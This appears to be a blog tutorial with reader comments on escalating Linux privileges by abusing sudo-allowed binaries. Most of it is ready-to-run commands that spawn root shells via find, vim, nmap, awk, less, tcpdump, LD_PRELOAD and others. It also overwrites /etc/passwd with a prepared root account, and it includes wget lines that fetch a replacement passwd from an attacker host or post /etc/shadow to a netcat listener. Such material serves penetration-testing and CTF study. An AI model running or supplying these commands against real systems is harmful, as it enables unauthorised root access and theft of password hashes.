If you have a limited shell that has access to some programs using the commandsudo you might be able to escalate your privileges. here I show some of the binary which helps you to escalate privilege using the sudo command. But before Privilege Escalation let’s understand some sudoer file syntax and what is sudo command is? ;).
Index
- What is SUDO?
- Sudoer FIle Syntax.
- Exploiting SUDO user
- /usr/bin/find
- /usr/bin/nano
- /usr/bin/vim
- /usr/bin/man
- /usr/bin/awk
- /usr/bin/less
- /usr/bin/nmap ( –interactive and –script method)
- /bin/more
- /usr/bin/wget
- /usr/sbin/apache2
What is SUDO ??
The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.
Sudoer File Syntax.
root ALL=(ALL) ALLExplain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo
touhid ALL= /sbin/poweroff
Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.
touhid ALL = (root) NOPASSWD: /usr/bin/findExplain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password.
Exploiting SUDO Users.
To Exploiting sudo user u need to find which command u have to allow.
sudo -l
The above command shows which command have allowed to the current user.
Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.
Let’s take a look at all binary one by one (which is mention in index only) and Escalate Privilege to root user.
Using Find Command
sudo find /etc/passwd -exec /bin/sh \;
or
sudo find /bin -name nano -exec /bin/sh \;
Using Vim Command
sudo vim -c '!sh'
Using Nmap Command
Old way.
sudo nmap --interactive nmap> !sh sh-4.1#
Note : nmap –interactive option not available in latest nmap.
Latest Way without –interactive
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Using Man Command
sudo man man
after that press !sh and hit enter
Using Less/More Command
sudo less /etc/hosts
sudo more /etc/hosts
after that press !sh and hit enter
Using awk Command
sudo awk 'BEGIN {system("/bin/sh")}'
Using nano Command
nano is text editor using this editor u can modify passwd file and add a user in passwd file as root privilege after that u need to switch user. Add this line in /etc/passwd to order to add the user as root privilege.
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
sudo nano /etc/passwd
now switch user password is : test
su touhid
Using wget Command
this very cool way which requires a Web Server to download a file. This way i never saw on anywhere. lets explain this.
On Attaker Side.
- First Copy Target’s /etc/passwd file to attacker machine.
- modify file and add a user in passwd file which is saved in the previous step to the attacker machine.
- append this line only => touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- host that passwd file to using any web server.
On Victim Side.
sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
now switch user password is : test
su touhid
Note: if u want to dump file from a server like a root’s ssh key, Shadow file etc.
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
Setup Listener on attacker : nc –lvp 8080
Using apache Command
sadly u cant get Shell and Cant edit system files.
but using this u can view system files.
sudo apache2 -f /etc/shadow
Output is like this :
Syntax error on line 1 of /etc/shadow: Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
Sadly no Shell. But you manage to extract root hash now Crack hash in your machine. For Shadow Cracking click here for more.
I posted some if you know any other please comment and share knowledge to other Happy HAcking.
sudo mount -o bind /bin/bash /bin/mount
sudo mount
thanks. For sharing us. 🙂
for extracting files
nc -lvp 80 > server_passwd
wget 127.0.0.1 –post-file /etc/passwd
Thanks for the kind post. Could I post on my blog after translating into my language, Korean?
Pleasure mate. You can POST on your Blog but you give the credit to the original author(me) on a post.
Hi, nice list.
You add tcpdump in there to exec commands as root.
$ echo $’id\ncat /etc/shadow’ > /tmp/.test
$ chmod +x /tmp/.test
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
Source:
https://www.stevencampbell.info/2016/04/why-sudo-tcpdump-is-dangerous/
thanks. 🙂
sudo strace -o/dev/null /bin/bash
:)..cool..
Great and extensive guide (y)
thanks mate.. 🙂
anyone way to prevent all of these but still allowing sudoer to su to root if they know the root password?
if u know the root’s password u dont need sudo group… u can get root’s privilege using “su – root” or “su root” and just type root’s password. but in some system like Solaris your current user must be an authorized user to do su command
I understand. I didn’t explain myself better hehe. I have Default rootpw in sudoers file which only allow the sudoer to su to root if I know the root password. So any command sudoer runs will require root’s password, in case suder is compromised. I thought that your methods are able to bypass this but I just tried all of them and you can’t.
Really cool list Touhid!
thank you @Danners.
@Andrew just restrict everything in the sudoers file and put only this line there:
%su ALL=(root) /bin/su
Then add your reliable users to the “su” group and get a root shell with “sudo su” and password.
Thanks, but I don’t think that’s what I want. Your method allows sudoer to su to root with just sudoer’s password. “Default rootpw” requires root password, and all privilege escalation mentioned here do not work.
Exploit sudoer with /usr/bin/pip install *
check https://github.com/0x00-0x00/FakePip
Sudo python -c ‘import pty; pty.spawn(“/bin/bash”)’.
Or the matter, any language like ruby or perl which can run a shell.
That was awesomely explained!
thanks man.. your word is boots me for more post. i hope u ll like my next posts also.
Very help full! Thanks for posting
su: Unknown id: touhid
could you please explain how the “sudo less /etc/hosts” and then “!sh” works? How and why is it working?
why you confuse mate ???
I’m using your method under wget, followed it exactly as you say, but I’m getting “unknown ID” when trying to switch user?
this method is works on Linux system.. if you are doing other than Linux like Solaris this method not work like this.
What is special about Solaris? How can I get it to work on Solaris?
Pingback: 【9.9】骚姿势记录及测试视频 – 即刻安全
I was wondering if it’s there any way to abuse of sudo if the entries are related to apt actions, for example :
touhid ALL = (root) NOPASSWD: /usr/bin/apt-get
touhid ALL = (root) NOPASSWD: /usr/bin/apt-cache
I’ve been checking a few test cases and it seems no to work, since you abuse of sudo just because the cmd tools have execution modes.
Thanks in advance,
H.
maybe this list is useful for you
https://gtfobins.github.io/
🙂
Pingback: Abusing SUDO (Linux Privilege Escalation) | Lowmiller Consulting Group Blog
Pingback: Hackthebox: Sunday Write-up | Porkypies
Pingback: 腾讯玄武实验室安全动态推送(Tencent Xuanwu Lab Security Daily News) - 2018/09/09
Pingback: Abusing SUDO – Recipe for Root
TH3xACE/SUDO_KILLER from github is a nice tool to automate the above described sceanarios and much more
Pingback: Abusing SUDO (Linux Privilege Escalation) - CertCube Labs
Pingback: [2/3] Mission-Pumpkin v1.0: PumpkinRaising — Walkthrough – Anu Shibin Joseph Raj
Cool Brother…Great Work
Regarding apache2, you can use the following C code (e.g. preload.c):
#include
#include
#include
void _init() {
unsetenv(“LD_PRELOAD”);
setresuid(0,0,0);
system(“/bin/bash -p”);
}
and then run it like so:
gcc -fPIC -shared -o /tmp/x.so preload.c -nostartfiles
sudo LD_PRELOAD=/tmp/x.so apache2
You’ll get shell.